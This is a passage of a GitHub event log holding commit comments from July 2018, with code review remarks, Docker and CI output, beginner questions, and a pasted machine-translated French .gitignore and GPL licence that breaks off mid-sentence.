{"id":"7973090687","type":"CommitCommentEvent","actor":{"login":"r1ft4469"},"repo":{"name":"brimstone/docker-kali"},"payload":{"comment":{"id":29726770,"position":null,"line":null,"path":null,"commit_id":"92aa1d10a6ab2596e8fb95e8f1debeb656a50de9","created_at":"2018-07-16T21:33:07Z","updated_at":"2018-07-16T21:33:07Z","author_association":"NONE","body":"I wonder if its because im running bash in the background before running the console that im not getting the error.\r\n\r\neg: \r\n`msf=\"$(docker run -d -t brimstone/docker-kalif:latest /bin/bash)\" \\\r\ndocker exec -ti $msf msf `"}},"created_at":"2018-07-16T21:33:07Z"}
{"id":"7973092893","type":"CommitCommentEvent","actor":{"login":"ibnesayeed"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29726785,"position":6,"line":5,"path":"dockerstart.sh","commit_id":"6f20f9bb6da299516a95cd27a0f452e998096f8a","created_at":"2018-07-16T21:33:40Z","updated_at":"2018-07-16T21:33:40Z","author_association":"MEMBER","body":"@shawnmjones, this environment variable can go to the `Dockerfile` and persist in the image.\r\n\r\n```Dockerfile\r\nENV FLASK_APP=mementoembed\r\n```\r\n\r\nAlso, you might want to use this script file as an entry point rather than running the main command from it. I have recently written [a simple benchmarking script](https://github.com/ibnesayeed/ipfsapi-concurrency-test) where you can see a similar technique in action."}},"created_at":"2018-07-16T21:33:40Z"}
{"id":"7973098468","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/lesson1"},"payload":{"comment":{"id":29726797,"position":23,"line":23,"path":"quadratic_equation.rb","commit_id":"08f6de327e043c5029528ea4e29a060014d6aabf","created_at":"2018-07-16T21:35:01Z","updated_at":"2018-07-16T21:35:01Z","author_association":"NONE","body":"а) не нужно использовать STDIN, достаточно просто gets\r\nб) вычисление дискриминанта производится дважды, вынесите вычисление, и используйте результат вычисления\r\nв) можно использовать puts, тогда не придется делать \\n"}},"created_at":"2018-07-16T21:35:01Z"}
{"id":"7973102423","type":"CommitCommentEvent","actor":{"login":"fredbuluku"},"repo":{"name":"hitbtc-com/hitbtc-api"},"payload":{"comment":{"id":29726804,"position":61,"line":60,"path":"README.md","commit_id":"8dc95b8fda406b0595bc39b46591b5d1e4ba7e23","created_at":"2018-07-16T21:36:00Z","updated_at":"2018-07-16T21:36:00Z","author_association":"NONE","body":"> restful API allow me to do business through HitBTC \r\n\r\n> remove all barriers \r\n\r\n> git effect the change"}},"created_at":"2018-07-16T21:36:00Z"}
{"id":"7973104763","type":"CommitCommentEvent","actor":{"login":"nkunal"},"repo":{"name":"salesforce/Argus"},"payload":{"comment":{"id":29726808,"position":63,"line":63,"path":"ArgusCore/src/test/java/com/salesforce/dva/argus/service/tsdb/AbstractTSDBServiceTest.java","commit_id":"f19c69c878e510af1d86c8de26607b4722a47fa1","created_at":"2018-07-16T21:36:33Z","updated_at":"2018-07-16T21:36:33Z","author_association":"NONE","body":"you could probably insert a known list of elements like [4,6,8,13,5,9] etc... and then call iter.next() as the actual code is doing it and then do a assert and see if the elements returned are in order."}},"created_at":"2018-07-16T21:36:33Z"}
{"id":"7973106064","type":"CommitCommentEvent","actor":{"login":"jcaw"},"repo":{"name":"abingham/emacs-traad"},"payload":{"comment":{"id":29726811,"position":null,"line":null,"path":null,"commit_id":"6a8073e8892a7bf2070fed5818e82f9e28fca09c","created_at":"2018-07-16T21:36:51Z","updated_at":"2018-07-16T21:36:51Z","author_association":"CONTRIBUTOR","body":"Small error here - should read \"also adds a _synchronous_ version of the command, `traad-goto-definition-synchronous'\". Sorry about that!"}},"created_at":"2018-07-16T21:36:51Z"}
{"id":"7973107274","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/lesson1"},"payload":{"comment":{"id":29726813,"position":10,"line":10,"path":"ideal_weigth.rb","commit_id":"c88e99e28079125d2f53160021864e4258d3f059","created_at":"2018-07-16T21:37:08Z","updated_at":"2018-07-16T21:37:08Z","author_association":"NONE","body":"a) не надо писать STDIN, достаточно gets\r\nб) не надо использовать тренарный оператор предназначенный для одно-строчной записи в двух-строчной записи, очень плохо читается. \r\nв) нет пустой строки в конце файла\r\n"}},"created_at":"2018-07-16T21:37:08Z"}
{"id":"7973109310","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/lesson1"},"payload":{"comment":{"id":29726815,"position":9,"line":9,"path":"triangle_square.rb","commit_id":"c88e99e28079125d2f53160021864e4258d3f059","created_at":"2018-07-16T21:37:35Z","updated_at":"2018-07-16T21:37:35Z","author_association":"NONE","body":"не надо использовать STDIN и нет пустой строки в конце файла"}},"created_at":"2018-07-16T21:37:35Z"}
{"id":"7973116208","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29726828,"position":null,"line":null,"path":null,"commit_id":"17ab6f21d09d13b1abe7c6c170c2ab8916701283","created_at":"2018-07-16T21:39:17Z","updated_at":"2018-07-16T21:39:17Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Odstranění šablony upravy.xtpl](https://trello.com/c/4sddPPph/543-odstran%C4%9Bn%C3%AD-%C5%A1ablony-upravyxtpl)"}},"created_at":"2018-07-16T21:39:17Z"}
{"id":"7973118873","type":"CommitCommentEvent","actor":{"login":"alimuqaddas"},"repo":{"name":"vgoskins/vcase"},"payload":{"comment":{"id":29726837,"position":5,"line":65,"path":"README.md","commit_id":"23cafd495072898e2d1584b5012b5e1b8aa9d2de","created_at":"2018-07-16T21:39:55Z","updated_at":"2018-07-16T21:39:55Z","author_association":"NONE","body":"I couldn't generate the Key using this as it says the username is not appropriate !! I couldn't find any reference solution to it !!!"}},"created_at":"2018-07-16T21:39:55Z"}
{"id":"7973119738","type":"CommitCommentEvent","actor":{"login":"gabrieladmbrasil"},"repo":{"name":"gabrieladmbrasil/lp"},"payload":{"comment":{"id":29726839,"position":224,"line":223,"path":"dfg.css","commit_id":"5dcbb045b177cf16259730b4ab127b9d39a5e6f0","created_at":"2018-07-16T21:40:08Z","updated_at":"2018-07-16T21:40:08Z","author_association":"OWNER","body":"cor de fundo : #5d9431 ! important ;"}},"created_at":"2018-07-16T21:40:08Z"}
{"id":"7973125149","type":"CommitCommentEvent","actor":{"login":"cgilroy"},"repo":{"name":"cgilroy/Configurator"},"payload":{"comment":{"id":29726852,"position":null,"line":null,"path":null,"commit_id":"d754c4696804aca3debbae8831bd974344a21c63","created_at":"2018-07-16T21:41:18Z","updated_at":"2018-07-16T21:41:18Z","author_association":"OWNER","body":"- Fixes (insulation not applying correctly, error checking panel edge angles, panels with more than 16 passes ruining tables)\r\n- Added experimental AutoCad integration"}},"created_at":"2018-07-16T21:41:18Z"}
{"id":"7973127361","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29726855,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T21:41:52Z","updated_at":"2018-07-16T21:41:52Z","author_association":"NONE","body":"Hello ! I’ m not very well in english. Do you understand french ? I’m senegalese. So i’m a starter in this domain so i want have clear mind about coding\n\nBaba Badiane\n\nDe : Zeke Sikelianos\nEnvoyé le :Altine 16 Sullet 2018 21:07\nÀ : nice-registry/owners\nCc : 1990b; Mention\nObjet :Re: [nice-registry/owners] it's a start (91c5a82)\n\nHi @1990b. I'm not sure I understand your question. Can you elaborate?\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-16T21:41:52Z"}
{"id":"7973131755","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/lesson1"},"payload":{"comment":{"id":29726864,"position":22,"line":22,"path":"right_triangle.rb","commit_id":"c35433f32a3865efb80dd9c5c2b677817acfc258","created_at":"2018-07-16T21:42:53Z","updated_at":"2018-07-16T21:42:53Z","author_association":"NONE","body":"Здорово сделано с sort и с map\r\nВ текущей реализации когда равнобедренность проверяется только у прямоугольных треугольников достаточно только \r\ninput[0] == input[1], ведь катет никак не может быть равен гипотенузе (не берем вырожденные треугольники вроде 0, 1, 1) \r\n\r\nНо надо дополнить реализацию:\r\n\r\nа) если треугольник равнобедренный (независимо от того, прямоугольный он или нет) - это должно быть выведено\r\nб) если треугольник равносторонний - это должно быть выведено\r\n\r\nВозможно это не очень очевидно, из названия задачи: \"прямоугольный треугольник\", но это указано в условии и это надо сделать "}},"created_at":"2018-07-16T21:42:53Z"}
{"id":"7973135000","type":"CommitCommentEvent","actor":{"login":"Tylarb"},"repo":{"name":"Tylarb/PCF-Support-Bot"},"payload":{"comment":{"id":29726875,"position":null,"line":null,"path":null,"commit_id":"45aa6f84b38c33030aabc5d393c5ecc015c88e9c","created_at":"2018-07-16T21:43:41Z","updated_at":"2018-07-16T21:43:41Z","author_association":"OWNER","body":"@ielizaga  Can you review this commit - added WIP API for adding items to the DB. Cache should be easy enough to build next. "}},"created_at":"2018-07-16T21:43:41Z"}
{"id":"7973139005","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29726882,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-16T21:44:41Z","updated_at":"2018-07-16T21:44:41Z","author_association":"CONTRIBUTOR","body":"Should I backport these changes to v1.15.x?"}},"created_at":"2018-07-16T21:44:41Z"}
{"id":"7973139263","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/sematext-agent-docker"},"payload":{"comment":{"id":29726883,"position":15,"line":101,"path":"lib/dockerAgent.js","commit_id":"b3719e18f4342467ca5f02fb6083514c21191c72","created_at":"2018-07-16T21:44:44Z","updated_at":"2018-07-16T21:44:44Z","author_association":"MEMBER","body":"typo @megastef "}},"created_at":"2018-07-16T21:44:44Z"}
{"id":"7973142810","type":"CommitCommentEvent","actor":{"login":"vijaysm"},"repo":{"name":"ClimateGlobalChange/tempestremap"},"payload":{"comment":{"id":29726894,"position":6,"line":534,"path":"src/OfflineMap.cpp","commit_id":"8107ab83d1fb8ea56fbae20003073521f3d5243a","created_at":"2018-07-16T21:45:36Z","updated_at":"2018-07-16T21:45:36Z","author_association":"CONTRIBUTOR","body":"So why was this index flipped ?"}},"created_at":"2018-07-16T21:45:36Z"}
{"id":"7973146117","type":"CommitCommentEvent","actor":{"login":"mediocremn"},"repo":{"name":"mediocremn/Fibonacci-Sequence"},"payload":{"comment":{"id":29726898,"position":null,"line":null,"path":null,"commit_id":"4ce1d84b40d3be5ccff155c7c55ee54c64a3fd15","created_at":"2018-07-16T21:46:22Z","updated_at":"2018-07-16T21:46:22Z","author_association":"OWNER","body":"This program finds the Fibonacci Sequence of the element entered."}},"created_at":"2018-07-16T21:46:22Z"}
{"id":"7973146214","type":"CommitCommentEvent","actor":{"login":"mchien20"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29726899,"position":null,"line":null,"path":null,"commit_id":"8e0c452e0c7fc5886047d24802e7c0e7bf56399c","created_at":"2018-07-16T21:46:24Z","updated_at":"2018-07-16T21:46:24Z","author_association":"COLLABORATOR","body":"I'm not getting the error anymore, and it doesn't seem to have affected anything."}},"created_at":"2018-07-16T21:46:24Z"}
{"id":"7973147851","type":"CommitCommentEvent","actor":{"login":"astro313"},"repo":{"name":"astro313/mc_eor"},"payload":{"comment":{"id":29726903,"position":null,"line":null,"path":null,"commit_id":"f795aed676ecbcf53f4ad483740056d203d4b021","created_at":"2018-07-16T21:46:47Z","updated_at":"2018-07-16T21:46:47Z","author_association":"OWNER","body":"@apallottini \r\n\r\nWill snapshot28_ytclump_fields.py work if we replace part of it with the new io_modules? Since there, we explicitly read in the .h5 file and read in args to decide whether or not to convert units, which should probably be `True` at all times? "}},"created_at":"2018-07-16T21:46:47Z"}
{"id":"7973155326","type":"CommitCommentEvent","actor":{"login":"AdonisN"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29726918,"position":null,"line":null,"path":null,"commit_id":"9d601157baf4de54b20454170af8d276c526e113","created_at":"2018-07-16T21:48:39Z","updated_at":"2018-07-16T21:48:39Z","author_association":"NONE","body":"I don't know how GitHub works... I have Processing, where do I get the \"IDE\"? Also how do I download these files? Where do I find \"NEAT\" for the AI? I need a step by step instruction on how to do this. :(\r\n"}},"created_at":"2018-07-16T21:48:39Z"}
{"id":"7973156849","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29726920,"position":null,"line":null,"path":null,"commit_id":"82e6bdc09952baaeb60e6defb28a9368a9bba7d9","created_at":"2018-07-16T21:49:03Z","updated_at":"2018-07-16T21:49:03Z","author_association":"NONE","body":"### Results for event id: 275564b0-f0c2-444b-aed9-e98dc79ada69\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (340 lines total):**\n\n```\n...\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'mv' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 100:13-31\n @ ./src/index.js\u001b[39m\u001b[22m\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Packaging service...\nsample-http/\nsample-http/sample-http.zip\nsample-http/serverless-state.json\nsample-http/cloudformation-template-update-stack.json\nDone in 26.34s.\nrelease package created, uploading to s3://gtmstorage4/releases/sample-http\nCompleted 256.0 KiB/873.4 KiB (488.1 KiB/s) with 1 file(s) remaining\rCompleted 512.0 KiB/873.4 KiB (740.4 KiB/s) with 1 file(s) remaining\rCompleted 768.0 KiB/873.4 KiB (1021.1 KiB/s) with 1 file(s) remaining\rCompleted 873.4 KiB/873.4 KiB (880.3 KiB/s) with 1 file(s) remaining \rupload: ../../output/packages/sample-http-0.0.1.tar.gz to s3://gtmstorage4/releases/sample-http/sample-http-0.0.1.tar.gz\nrelease upload completed!\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 275564b0-f0c2-444b-aed9-e98dc79ada69-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/275564b0-f0c2-444b-aed9-e98dc79ada69-output.tar.gz\n{\n    \"ETag\": \"\\\"966bf04e38c6bdd8643d1710add54b89\\\"\"\n}\nExecution time was 149 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T21:49:03Z"}
{"id":"7973157269","type":"CommitCommentEvent","actor":{"login":"AlainGIGNAC"},"repo":{"name":"AlainGIGNAC/figure.visualstudio.com"},"payload":{"comment":{"id":29726922,"position":null,"line":null,"path":null,"commit_id":"f376b721655f6aefd94b169e5f323195e1805a78","created_at":"2018-07-16T21:49:09Z","updated_at":"2018-07-16T21:49:09Z","author_association":"OWNER","body":"@@ -0,0 +1,330 @@\r\n+ ## Ignorer les fichiers temporaires Visual Studio, les résultats de génération et\r\n+ ## fichiers générés par les modules complémentaires Visual Studio populaires.\r\n+ ##\r\n+ ## Recevez les dernières nouvelles de https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\r\n+\r\n+ # Fichiers spécifiques à l'utilisateur\r\n+ *. suo\r\n+ *. utilisateur\r\n+ *. userosscache\r\n+ *. sln.docstates\r\n+\r\n+ # Fichiers spécifiques à l'utilisateur (MonoDevelop / Xamarin Studio)\r\n+ *. userprefs\r\n+\r\n+ # Construire les résultats\r\n+ [Dd] ebug /\r\n+ [Dd] ebugPublic /\r\n+ [Rr] elease /\r\n+ [Rr] eleases /\r\n+ x64 /\r\n+ x86 /\r\n+ bld /\r\n+ [Bb] dans /\r\n+ [Oo] bj /\r\n+ [Ll] og /\r\n+\r\n+ Cache # Visual Studio 2015/2017 cache / options\r\n+ .vs /\r\n+ # Ne pas commenter si vous avez des tâches qui créent les fichiers statiques du projet dans wwwroot\r\n+ # wwwroot /\r\n+\r\n+ # Fichiers générés automatiquement par Visual Studio 2017\r\n+ Généré \\ Fichiers /\r\n+\r\n+ # Résultats du test MSTest\r\n+ [Tt] est [Rr] esult * /\r\n+ [Bb] uild [Ll] og. *\r\n+\r\n+ # NUNIT\r\n+ *. VisualState.xml\r\n+ TestResult.xml\r\n+\r\n+ # Construire les résultats d'un projet ATL\r\n+ [Dd] ebugPS /\r\n+ [Rr] eleasePS /\r\n+ dlldata.c\r\n+\r\n+ # Résultats de l'analyse comparative\r\n+ BenchmarkDotNet.Artifacts /\r\n+\r\n+ # .NET Core\r\n+ project.lock.json\r\n+ project.fragment.lock.json\r\n+ artefacts /\r\n+ ** / Propriétés / launchSettings.json\r\n+\r\n+ # StyleCop\r\n+ StyleCopReport.xml\r\n+\r\n+ # Fichiers créés par Visual Studio\r\n+ * _ i.c\r\n+ * _ p.c\r\n+ * _ i.h\r\n+ *. ilk\r\n+ *. méta\r\n+ *. obj\r\n+ *. iobj\r\n+ *. pch\r\n+ *. pdb\r\n+ *. ipdb\r\n+ *. pgc\r\n+ *. pgd\r\n+ *. rsp\r\n+ *. sbr\r\n+ *. tlb\r\n+ *. tli\r\n+ *. tlh\r\n+ *. tmp\r\n+ *. tmp_proj\r\n+ *. log\r\n+ *. vspscc\r\n+ *. vssscc\r\n+ .builds\r\n+ *. pidb\r\n+ *. svclog\r\n+ *. scc\r\n+\r\n+ # Fichiers de test Chutzpah\r\n+ _Chutzpah *\r\n+\r\n+ # Fichiers de cache Visual C ++\r\n+ ipch /\r\n+ *. aps\r\n+ *. ncb\r\n+ *. opendb\r\n+ *. opensdf\r\n+ *. sdf\r\n+ *. cachefile\r\n+ *. VC.db\r\n+ *. VC.VC.opendb\r\n+\r\n+ # Visual Studio profiler\r\n+ *. psess\r\n+ *. vsp\r\n+ *. vspx\r\n+ *. sève\r\n+\r\n+ # Fichiers de trace Visual Studio\r\n+ *. e2e\r\n+\r\n+ # Espace de travail local TFS 2012\r\n+ $ tf /\r\n+\r\n+ # Toolkit d'automatisation du guidage\r\n+ *. gpState\r\n+\r\n+ # ReSharper est un complément de codage .NET\r\n+ _ReSharper * /\r\n+ *. [Rr] e [Ss] harpe\r\n+ *. DotSettings.user\r\n+\r\n+ # JustCode est un complément de codage .NET\r\n+ .JustCode\r\n+\r\n+ # TeamCity est un complément de build\r\n+ _TeamCity *\r\n+\r\n+ # DotCover est un outil de couverture de code\r\n+ *. dotCover\r\n+\r\n+ # AxoCover est un outil de couverture de code\r\n+ .axoCover / *\r\n+ !. axoCover / settings.json\r\n+\r\n+ # Résultats de la couverture du code Visual Studio\r\n+ *. couverture\r\n+ *. coveragexml\r\n+\r\n+ # NCrunch\r\n+ _NCrunch_ *\r\n+. * crunch * .local.xml\r\n+ nCrunchTemp_ *\r\n+\r\n+ # MightyMoose\r\n+ *. mm. *\r\n+ AutoTest.Net /\r\n+\r\n+ # Workbench Web (sass)\r\n+ .sass-cache /\r\n+\r\n+ # Dossier de sortie de Installshield\r\n+ [Ee] xpress /\r\n+\r\n+ # DocProject est un complément de générateur de documentation\r\n+ DocProject / buildhelp /\r\n+ DocProject / Aide / *. HxT\r\n+ DocProject / Aide / *. HxC\r\n+ DocProject / Aide / *. Hhc\r\n+ DocProject / Aide / *. Hhk\r\n+ DocProject / Aide / *. Hhp\r\n+ DocProject / Aide / Html2\r\n+ DocProject / Aide / html\r\n+\r\n+ # Click-Once répertoire\r\n+ publier /\r\n+\r\n+ # Publier la sortie Web\r\n+ *. [Pp] ublish.xml\r\n+ *. azurePubxml\r\n+ # Remarque: commentez la ligne suivante si vous voulez vérifier vos paramètres de déploiement Web,\r\n+ # mais les chaînes de connexion à la base de données (avec des mots de passe potentiels) ne seront pas cryptées\r\n+ *. pubxml\r\n+ *. publishproj\r\n+\r\n+ # Paramètres de publication de Microsoft Azure Web App. Commentez la ligne suivante si vous voulez\r\n+ # vérifier les paramètres de publication de votre application Web Azure, mais les informations sensibles contenues\r\n+ # dans ces scripts ne sera pas crypté\r\n+ PublishScripts /\r\n+\r\n+ # Forfaits NuGet\r\n+ *. nupkg\r\n+ # Le dossier des paquets peut être ignoré à cause de la restauration de paquet\r\n+ ** / [Pp] ackages / *\r\n+ # sauf build /, qui est utilisé comme cible MSBuild.\r\n+! ** / [Pp] ackages / build /\r\n+ # Uncomment si nécessaire mais généralement il sera régénéré si nécessaire\r\n+ #! ** / [Pp] ackages / repositories.config\r\n+ # Les fichiers project.json de NuGet v3 produisent plus de fichiers ignorables\r\n+ *. nuget.props\r\n+ *. nuget.targets\r\n+\r\n+ # Microsoft Azure Build Output\r\n+ csx /\r\n+ *. build.csdef\r\n+\r\n+ # Microsoft Azure Emulator\r\n+ ecf /\r\n+ rcf /\r\n+\r\n+ # Répertoires et fichiers de packages d'applications Windows Store\r\n+ AppPackages /\r\n+ BundleArtifacts /\r\n+ Package.StoreAssociation.xml\r\n+ _pkginfo.txt\r\n+ *. appx\r\n+\r\n+ # Fichiers cache Visual Studio\r\nLes fichiers + # se terminant par .cache peuvent être ignorés\r\n+ *. [Cc] mal\r\n+ # mais garde trace des répertoires se terminant par .cache\r\n+! *. [Cc] douleur /\r\n+\r\n+ # Autres\r\n+ ClientBin /\r\n+ ~ $ *\r\n+ * ~\r\n+ *. dbmdl\r\n+ *. dbproj.schemaview\r\n+ *. jfm\r\n+ *. pfx\r\n+ *. publishsettings\r\n+ orleans.codegen.cs\r\n+\r\n+ # Y compris les fichiers de noms forts peuvent présenter un risque de sécurité \r\n+ # (https://github.com/github/gitignore/pull/2483#issue-259490424)\r\n+ # *. snk\r\n+\r\n+ # Puisqu'il y a plusieurs flux de travail, décommentez la ligne suivante pour ignorer bower_components\r\n+ # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\r\n+ # bower_components /\r\n+\r\n+ # Projets RIA / Silverlight\r\n+ Generated_Code /\r\n+\r\n+ # Sauvegarde et rapports des fichiers de la conversion d'un ancien fichier de projet\r\n+ # à une version plus récente de Visual Studio. Les fichiers de sauvegarde ne sont pas nécessaires,\r\n+ # parce que nous avons git ;-)\r\n+ _UpgradeReport_Files /\r\n+ Sauvegarde * /\r\n+ UpgradeLog * .XML\r\n+ UpgradeLog * .htm\r\n+ ServiceFabricBackup /\r\n+ *. rptproj.bak\r\n+\r\n+ # Fichiers SQL Server\r\n+ *. mdf\r\n+ *. ldf\r\n+ *. ndf\r\n+\r\n+ # Projets de Business Intelligence\r\n+ *. rdl.data\r\n+ *. bim.layout\r\n+ *. bim _ *. paramètres\r\n+ *. rptproj.rsuser\r\n+\r\n+ # Microsoft Fakes\r\n+ FakesAssemblies /\r\n+\r\n+ # Fichier de configuration du plugin GhostDoc\r\n+ *. GhostDoc.xml\r\n+\r\n+ # Node.js Outils pour Visual Studio\r\n+ .ntvs_analysis.dat\r\n+ node_modules /\r\n+\r\n+ # Visual Studio 6 build log\r\n+ *. plg\r\n+\r\n+ # Fichier d'options de l'espace de travail Visual Studio 6\r\n+ *. opt\r\n+\r\n+ # Fichier d'espace de travail généré automatiquement par Visual Studio 6 (contient les fichiers ouverts, etc.)\r\n+ *. vbw\r\n+\r\n+ # Sortie de génération de Visual Studio LightSwitch\r\n+ ** / *. HTMLClient / GeneratedArtifacts\r\n+ ** / *. DesktopClient / GeneratedArtifacts\r\n+ ** / *. DesktopClient / ModelManifest.xml\r\n+ ** / *. Server / GeneratedArtifacts\r\n+ ** / *. Serveur / ModelManifest.xml\r\n+ _Pvt_Extensions\r\n+\r\n+ # Gestionnaire de dépendances de paket\r\n+ .paket / paket.exe\r\n+ fichiers-paket /\r\n+\r\n+ # FAKE - F # Make\r\n+ .fake /\r\n+\r\n+ # JetBrains Rider\r\n+ .idea /\r\n+ *. sln.iml\r\n+\r\n+ # CodeRush\r\n+ .cr /\r\n+\r\n+ # Outils Python pour Visual Studio (PTVS)\r\n+ __ pycache __ /\r\n+ *. pyc\r\n+\r\n+ # Cake - Ne pas commenter si vous l'utilisez\r\n+ # outils / **\r\n+ #! tools / packages.config\r\n+\r\n+ # Tabs Studio\r\n+ *. tss\r\n+\r\n+ # Le fichier de configuration JustMock de Telerik\r\n+ *. jmconfig\r\n+\r\n+ # Sortie de construction BizTalk\r\n+ *. btp.cs\r\n+ *. btm.cs\r\n+ *. odx.cs\r\n+ *. xsd.cs\r\n+\r\n+ # Résultats de l'analyse de l'interface utilisateur OpenCover\r\n+ OpenCover /\r\n+\r\n+ # Sortie d'exécution locale Azure Stream Analytics \r\n+ ASALocalRun /\r\n+\r\n+ # MSBuild Binaire et Journal Structuré\r\n+ *. binlog\r\n+\r\n+ # Fichier de configuration du débogueur NVidia Nsight GPU\r\n+ *. nvuser\r\n+\r\n+ # MFractors (outil de productivité Xamarin) dossier de travail \r\n+ .mfractor /\r\n \r\n674  LICENCE\r\n@@ -0,0 +1 674 @@\r\n+ GNU LICENCE PUBLIQUE GÉNÉRALE\r\n+ Version 3, 29 juin 2007\r\n+\r\n+ Droit d'auteur (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>\r\n+ Tout le monde est autorisé à copier et à distribuer des copies textuelles\r\n+ de ce document de licence, mais le modifier n'est pas autorisé.\r\n+\r\n+ Préambule\r\n+\r\n+ La licence publique générale GNU est une licence libre et copyleft pour\r\n+ logiciel et autres types de travaux.\r\n+\r\n+ Les licences pour la plupart des logiciels et autres travaux pratiques sont conçues\r\n+ d'enlever votre liberté de partager et de changer les œuvres. Par contre,\r\n+ La Licence Publique Générale GNU est destinée à garantir votre liberté de\r\n+ partager et modifier toutes les versions d'un programme - pour s'assurer qu'il reste libre\r\n+ logiciel pour tous ses utilisateurs. Nous, la Free Software Foundation, utilisons le\r\n+ GNU General Public License pour la plupart de nos logiciels; cela s'applique aussi à\r\n+ tout autre travail publié de cette façon par ses auteurs. Vous pouvez l'appliquer à\r\n+ vos programmes, aussi.\r\n+\r\n+ Quand on parle de logiciel libre, on parle de liberté, pas de\r\n+ prix. Nos licences publiques générales sont conçues pour vous assurer que vous\r\n+ avoir la liberté de distribuer des copies de logiciels libres (et de facturer\r\n+ eux si vous souhaitez), que vous recevez le code source ou pouvez l'obtenir si vous\r\n+ le veut, que vous pouvez changer le logiciel ou en utiliser des morceaux dans de nouveaux\r\n+ programmes gratuits, et que vous savez que vous pouvez faire ces choses.\r\n+\r\n+ Pour protéger vos droits, nous devons empêcher les autres de vous nier\r\n+ ces droits ou vous demander de renoncer aux droits. Par conséquent, vous avez\r\n+ certaines responsabilités si vous distribuez des copies du logiciel, ou si\r\n+ vous le modifiez: les responsabilités de respecter la liberté des autres.\r\n+\r\n+ Par exemple, si vous distribuez des copies d'un tel programme, que ce soit\r\n+ gratis ou payant, vous devez transmettre aux destinataires les mêmes\r\n+ libertés que vous avez reçues. Vous devez vous assurer qu'ils reçoivent eux aussi\r\n+ ou peut obtenir le code source. Et vous devez leur montrer ces termes afin qu'ils\r\n+ connaître leurs droits.\r\n+\r\n+ Les développeurs qui utilisent la GNU GPL protègent vos droits en deux étapes:\r\n+ (1) affirme le droit d'auteur sur le logiciel, et (2) vous offre cette licence\r\n+ vous donner la permission légale de copier, distribuer et / ou modifier.\r\n+\r\n+ Pour la protection des développeurs et des auteurs, la GPL explique clairement\r\n+ qu'il n'y a aucune garantie pour ce logiciel gratuit. Pour les utilisateurs et\r\n+ Pour les auteurs, la GPL exige que les versions modifiées soient marquées comme\r\n+ changé, afin que leurs problèmes ne soient pas attribués par erreur à\r\n+ auteurs des versions précédentes.\r\n+\r\n+ Certains appareils sont conçus pour empêcher les utilisateurs d'accéder à l'installation ou à l'exécution\r\n+ versions modifiées du logiciel à l'intérieur d'eux, bien que le fabricant\r\n+ peut le faire. Ceci est fondamentalement incompatible avec l'objectif de\r\n+ protéger la liberté des utilisateurs de changer le logiciel. Le systématique\r\n+ modèle de tels abus se produit dans le domaine des produits pour les individus à\r\n+ utilisation, qui est précisément là où c'est le plus inacceptable. Par conséquent, nous\r\n+ ont conçu cette version de la GPL pour interdire la pratique à ceux qui\r\n+ produits Si de tels problèmes se posent essentiellement dans d'autres domaines, nous\r\n+ être prêt à étendre cette disposition à ces domaines dans les futures versions\r\n+ de la GPL, au besoin pour protéger la liberté des utilisateurs.\r\n+\r\n+ Enfin, chaque programme est constamment menacé par des brevets logiciels.\r\n+ Les États ne devraient pas autoriser les brevets à restreindre le développement et l'utilisation de\r\n+ logiciel sur les ordinateurs à usage général, mais dans ceux qui le font, nous souhaitons\r\n+ éviter le danger spécial que les brevets appliqués à un programme libre\r\n+ le rendre effectivement propriétaire. Pour éviter cela, la GPL assure que\r\n+ les brevets ne peuvent pas être utilisés pour rendre le programme non-libre.\r\n+\r\n+ Les termes et conditions précis pour la copie, la distribution et\r\n+ modification suivre.\r\n+\r\n+ TERMES ET CONDITIONS\r\n+\r\n+ 0. Définitions.\r\n+\r\n+ \"Cette Licence\" fait référence à la version 3 de la Licence Publique Générale GNU.\r\n+\r\n+ \"Copyright\" signifie également des lois de type copyright qui s'appliquent à d'autres types de\r\n+ fonctionne, comme les masques à semi-conducteurs.\r\n+\r\n+ \"Le programme\" fait référence à tout travail protégé par des droits d'auteur sous cette\r\n+ Licence. Chaque titulaire de licence est appelé 